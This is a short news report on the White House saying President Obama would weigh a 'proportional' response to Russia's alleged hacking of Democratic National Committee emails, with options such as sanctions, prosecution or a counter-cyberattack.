After the Director of National Intelligence and Department of Homeland Security publicly blamed Russia for stealing and publishing archived emails from the Democratic National Committee on Friday, White House Press Secretary Josh Earnest said today that President Obama will consider a "proportional" response. ABC News reports: "We obviously will ensure that a U.S. response is proportional. It is unlikely that our response would be announced in advance. It's certainly possible that the president could choose response options that we never announce," Earnest told reporters aboard Air Force One. "The president has talked before about the significant capabilities that the U.S. government has to both defend our systems in the United States but also carry out offensive operations in other countries," he added. "There are a range of responses that are available to the president and he will consider a response that's proportional." The Wall Street Journal report mentions several different ways to respond to Russia. The U.S. could impose economic sanctions against Moscow, punish Russia diplomatically, opt to allow the Justice Department to simply prosecute the hacks as a criminal case, and/or launch a U.S. cyberattack targeting Russia's election process. Of course, each response has its pros and cons. "They could escalate into a more adversarial conflict between both countries," writes Carol E. Lee for the Wall Street Journal. "But the absence of a response could signal that such behavior will be tolerated in the future."
